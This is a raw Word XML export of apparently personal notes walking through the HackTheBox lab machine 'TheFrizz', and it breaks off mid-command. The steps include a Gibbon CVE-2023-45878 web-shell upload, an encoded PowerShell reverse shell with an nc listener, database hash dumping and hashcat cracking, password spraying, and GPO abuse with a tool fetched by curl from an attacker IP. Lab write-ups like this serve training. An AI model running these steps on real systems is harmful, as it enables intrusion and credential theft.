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5547D1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1A0F03">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TheFrizz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0CC47AA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1A0F03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EC406FA" w:rsidR="00843DCE" w:rsidRDefault="007A5B8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add to the details to the /etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671FD9FF" w14:textId="3987450F" w:rsidR="00074FEB" w:rsidRDefault="00074FE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the version so just search cve details = gi</w:t>
      </w:r>
      <w:r w:rsidR="0027756A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bbon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32396181" w14:textId="1DBFB269" w:rsidR="00080E89" w:rsidRDefault="0005284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select the version that we have 25.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D5B671" w14:textId="72C4C026" w:rsidR="006117C0" w:rsidRDefault="001E132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click on cve-2023-45878</w:t>
      </w:r>
      <w:r w:rsidR="006117C0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = we notice request that sent ad img and then provide shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7446187B" w14:textId="56AA7889" w:rsidR="007A5B8F" w:rsidRDefault="006117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the burp suit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A093C9C" w14:textId="48716685" w:rsidR="006117C0" w:rsidRDefault="00B15D8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edit with the cve then sent the request. it response with the file name which we sent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B4C630" w14:textId="4349C6DA" w:rsidR="00B15D8D" w:rsidRDefault="00B15D8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obtain another request /asdf.php in response we notice the full path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7593AC7B" w14:textId="655AC37A" w:rsidR="0083786D" w:rsidRDefault="0083786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asdf.php?cmd=whoami = we notice we obtain the response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C1EE23" w14:textId="004D6335" w:rsidR="00A111B9" w:rsidRDefault="00A111B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copy the </w:t>
      </w:r>
      <w:r w:rsidR="00EC3E3D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nvoke-</w:t>
      </w:r>
      <w:r w:rsidR="00EC3E3D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ower</w:t>
      </w:r>
      <w:r w:rsidR="00EC3E3D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>helli</w:t>
      </w:r>
      <w:r w:rsidR="00EC3E3D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cp</w:t>
      </w:r>
      <w:r w:rsidR="00EC3E3D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ne</w:t>
      </w:r>
      <w:r w:rsidR="00EC3E3D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ine.ps1</w:t>
      </w:r>
      <w:r w:rsidR="00027514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to shell.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D02904F" w14:textId="7938A52F" w:rsidR="00027514" w:rsidRDefault="00F1135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 to that file with the bigger one with our ip and port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0706ADA1" w14:textId="3D702E67" w:rsidR="00F1135E" w:rsidRDefault="0049415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shell.ps1 | iconv -t utf-16le |base64 -w0;</w:t>
      </w:r>
      <w:r w:rsidR="00AE62F8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = iconv is the favorite of ps1  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13268EE1" w14:textId="15AD360A" w:rsidR="00494157" w:rsidRDefault="0049415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?cmd=powershell+-enc+paste</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE5229E" w14:textId="6151587D" w:rsidR="00494157" w:rsidRDefault="00AE62F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the nc -lvnp 9001 = and we obtain the shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4137502C" w14:textId="68FE4F85" w:rsidR="00703261" w:rsidRDefault="0070326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fail, notice the url if + change to %2b in base64 only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343B5E46" w14:textId="2B0A6E01" w:rsidR="00703261" w:rsidRDefault="0070326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its obtain the shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7C02D6" w14:textId="3A3BA9E9" w:rsidR="00703261" w:rsidRDefault="0083518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dir = config.php</w:t>
      </w:r>
      <w:r w:rsidR="00F744CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = we obtain password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC110A1" w14:textId="314C3290" w:rsidR="00F744CD" w:rsidRDefault="000F3FC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can start the mysql from that shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075FF511" w14:textId="6D769B99" w:rsidR="000F3FC8" w:rsidRDefault="000F3FC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c\xampp\mysql = bin = mysqldump.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A25E108" w14:textId="6AAC89F5" w:rsidR="00F55F5B" w:rsidRDefault="00F55F5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./mysql.exe -u name -p ‘password’ gibbon -e ‘show tables’; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A8DD69" w14:textId="2F268EE2" w:rsidR="00F55F5B" w:rsidRDefault="00F55F5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gibbon is the database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD83901" w14:textId="6C20493E" w:rsidR="00EF0761" w:rsidRDefault="00EF076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find users = we notice persone = gibbonperson</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230CD0B0" w14:textId="4D442EB8" w:rsidR="00EF0761" w:rsidRDefault="00EF0761" w:rsidP="00EF076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./mysql.exe -u name -p ‘password’ gibbon -e ‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>describe gibbon person</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">’; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72599174" w14:textId="01D6A70A" w:rsidR="00EF0761" w:rsidRDefault="0020481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notice username, passwordstrong, passwordstrongsalt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6923BCD1" w14:textId="738522F3" w:rsidR="00204816" w:rsidRDefault="00204816" w:rsidP="002048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./mysql.exe -u name -p ‘password’ gibbon -e ‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>select username, passwordstrong, passwordstrongsalt from gibbonperon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">’; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278C5A40" w14:textId="0E3E3224" w:rsidR="00204816" w:rsidRDefault="0020481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</w:t>
      </w:r>
      <w:r w:rsidR="00BD28E3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> we obtain the information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B73ABB0" w14:textId="146E4BB2" w:rsidR="00BD28E3" w:rsidRDefault="00BD28E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cannot use it directory because of 65 worlds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A48C64A" w14:textId="20731EBE" w:rsidR="00EF7F3C" w:rsidRDefault="00E74F8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username:strong:salt = save in file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136F3BA0" w14:textId="0051F4CC" w:rsidR="007A5B8F" w:rsidRDefault="00A95EB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hashcat file rockyou.txt</w:t>
      </w:r>
      <w:r w:rsidR="006B3794">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = in that error we can notice that the 1420 which shows that with salt change password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568BDAA0" w14:textId="505222F8" w:rsidR="007A5B8F" w:rsidRDefault="00831FE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hashcat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">-m 1420 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>file rockyou.txt</w:t>
      </w:r>
      <w:r w:rsidR="00BA59C3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = Jenni_Luvs_magic23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A16CEFC" w14:textId="233989A0" w:rsidR="00BA59C3" w:rsidRDefault="00BA59C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nxc smb t_ip -u f.frizzle -p password </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B636B1" w14:textId="52C5E213" w:rsidR="00BA59C3" w:rsidRDefault="00BA59C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status not support use -k</w:t>
      </w:r>
      <w:r w:rsidR="00BC0B00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. if error then ntpdate t_ip and remove t_ip, add </w:t>
      </w:r>
      <w:r w:rsidR="000E0BFA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>host</w:t>
      </w:r>
      <w:r w:rsidR="00BC0B00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79450CA6" w14:textId="4F169367" w:rsidR="001A5490" w:rsidRDefault="001A549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 bloodhound to find the files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6324AC09" w14:textId="0E348BE7" w:rsidR="001A5490" w:rsidRDefault="001A549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neo4j start and bloodhound start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA8080B" w14:textId="0CCFD8CE" w:rsidR="001A5490" w:rsidRDefault="003F7D2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shortest path from own objects = member of the remote management users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A69DA70" w14:textId="7DC4BBB1" w:rsidR="003F7D28" w:rsidRDefault="003A709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make sure that in the /etc/hosts = frizzd.frizz.htb frizzdc frizz.htb = that format only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1768F7" w14:textId="37B23538" w:rsidR="007A5B8F" w:rsidRDefault="008F0EB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KRB5CCNAME=f.frizzle.ccache ssh -K </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="009C67C2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>f.frizzle@frizzdc.frizz.htb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-v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD5B939" w14:textId="5079898D" w:rsidR="008F0EB9" w:rsidRDefault="008F0EB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powershell of it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24461FF3" w14:textId="254C2466" w:rsidR="008F0EB9" w:rsidRDefault="009E6F0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1 file in recicalbin so try to download it via</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFDE9D8" w14:textId="79C89BEB" w:rsidR="00BF1F46" w:rsidRDefault="00BF1F4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‘.\</w:t>
      </w:r>
      <w:r w:rsidR="001E6AB6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RE2XMEG.7z’ \programdata\</w:t>
      </w:r>
      <w:r w:rsidR="001E6AB6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>wapt.7z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20078591" w14:textId="523074AF" w:rsidR="001E6AB6" w:rsidRDefault="001E6AB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\programdata\wapt.7z = at C:\xampp\htdocs\home</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB32773" w14:textId="3E420310" w:rsidR="001E6AB6" w:rsidRDefault="001E6AB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 = wget frizz.htb/home/wapt.7z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AD7E2E" w14:textId="5812325A" w:rsidR="00DD2399" w:rsidRDefault="00DD239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md5sum wapt.7z.1 = which we downloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A483FBF" w14:textId="30CA32F8" w:rsidR="001E6AB6" w:rsidRDefault="00696F9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mv wapt.7z.1 wa</w:t>
      </w:r>
      <w:r w:rsidR="00E160AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>t.7z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C03908" w14:textId="20C6C83A" w:rsidR="00E160AE" w:rsidRDefault="00E160A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7z x wapt.7z = we obtain the path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5053E5" w14:textId="125BE345" w:rsidR="00DD5F70" w:rsidRDefault="00DD5F7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wapt = cd conf = cat waptserver.ini</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C427CF5" w14:textId="1D4E4CC6" w:rsidR="00DD5F70" w:rsidRDefault="0037224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the password in base64 format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A9AE08" w14:textId="30ACE522" w:rsidR="0037224D" w:rsidRDefault="0037224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paste | base64 -d = obtain password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A89531F" w14:textId="257BFC7F" w:rsidR="0037224D" w:rsidRDefault="0037224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obtain the user lists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73214B74" w14:textId="40F2D6B1" w:rsidR="0037224D" w:rsidRDefault="0037224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xxxxx_users.json = which we obtain from bloodhound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FFEBE0" w14:textId="642B9910" w:rsidR="007A5B8F" w:rsidRDefault="005714C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notice there which parameter is use for name = samaccountname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E0ABD8" w14:textId="3BBA8B6C" w:rsidR="005714C1" w:rsidRDefault="005714C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cat xxxxx_users.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> | jq .data[].Properties.samaccountname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14421285" w14:textId="78D2DDF4" w:rsidR="005714C1" w:rsidRDefault="005714C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the name copy that in file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43897930" w14:textId="387A57B7" w:rsidR="005714C1" w:rsidRDefault="005714C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frizzed.frizz.htb -k -u user.txt -p ‘paste’ - -continue-on-success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AD57E4" w14:textId="6872BD9A" w:rsidR="005714C1" w:rsidRDefault="006B48B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have obtain the m.schoolbus with our password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CFB049" w14:textId="6A9F6E1B" w:rsidR="006B48B1" w:rsidRDefault="006B48B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bloodhound own this and there ahs outbound user so here we notice we can access desktop admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A70B471" w14:textId="2EA0C018" w:rsidR="006B48B1" w:rsidRDefault="006B48B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getTGT.py frizz.htb/m.schoolbus:’paste’ = to save the ticket in m.schoolbus.cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693B1DEC" w14:textId="1BB19FA6" w:rsidR="006B48B1" w:rsidRDefault="008C133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KRB5CCNAME=m.schoolbus.ccache ssh -k </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="009C67C2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>m.schoolbus@frixxdc.frixx.htb</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0E285D13" w14:textId="62EE4D2A" w:rsidR="008C133E" w:rsidRDefault="00A36C7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/opt/SharpCollection/Netframwork_4.7_any/SharpGPOAbuse.exe .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6A74BD" w14:textId="552BFDE4" w:rsidR="00A36C79" w:rsidRDefault="00AA610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python3 -m http.server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5063C9D2" w14:textId="083EB9F1" w:rsidR="00742B94" w:rsidRDefault="00742B9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programdata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11ACD03A" w14:textId="25A91F99" w:rsidR="00AA6103" w:rsidRDefault="00742B9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shell curl </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="009C67C2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://10.10.14.56:8000/SharpGPOAbuse.exe -o SharpGPOAbuse.exe</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="28EEE9E5" w14:textId="4F9175E4" w:rsidR="007A5B8F" w:rsidRDefault="0062510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whoami /all = we also notice that group police creator owners</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB42265" w14:textId="77777777" w:rsidR="00A933C2" w:rsidRDefault="00A933C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./SharpGPOAbuse.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -h = make sure its run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E968257" w14:textId="77777777" w:rsidR="00B25819" w:rsidRDefault="00B25819" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="729495F3" w14:textId="77777777" w:rsidR="00B25819" w:rsidRDefault="00B2581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create own gpo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287BD441" w14:textId="77777777" w:rsidR="00B25819" w:rsidRDefault="00B2581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5FBEECFC" w14:textId="6795933C" w:rsidR="00A43185" w:rsidRDefault="00B2581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New-GPO -name “</w:t>
      </w:r>
      <w:r w:rsidR="00A43185">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bhavya” =this will create gpu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EB3DDF" w14:textId="2A4FCE4D" w:rsidR="009826AF" w:rsidRDefault="009826A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New-GPLINK -name “bhavya” -target “OU=DOMAIN CONTROLLERS,DC=FRIZZ,D=HTB” = we obtain that ou from bloodhound user info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D541E15" w14:textId="4E771C83" w:rsidR="0056224F" w:rsidRDefault="00FC398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nc -lvnp 9001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5591B295" w14:textId="13962380" w:rsidR="007A5B8F" w:rsidRDefault="0056224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./sharpgpoabuse.exe - -</w:t>
      </w:r>
      <w:r w:rsidR="00FC398A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dd</w:t>
      </w:r>
      <w:r w:rsidR="00FC398A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>omputer</w:t>
      </w:r>
      <w:r w:rsidR="00FC398A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ask - -GPOName </w:t>
      </w:r>
      <w:r w:rsidR="00FC398A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bhavya</w:t>
      </w:r>
      <w:r w:rsidR="00FC398A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="00FC398A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">uthor </w:t>
      </w:r>
      <w:r w:rsidR="00FC398A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bhavya</w:t>
      </w:r>
      <w:r w:rsidR="00FC398A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
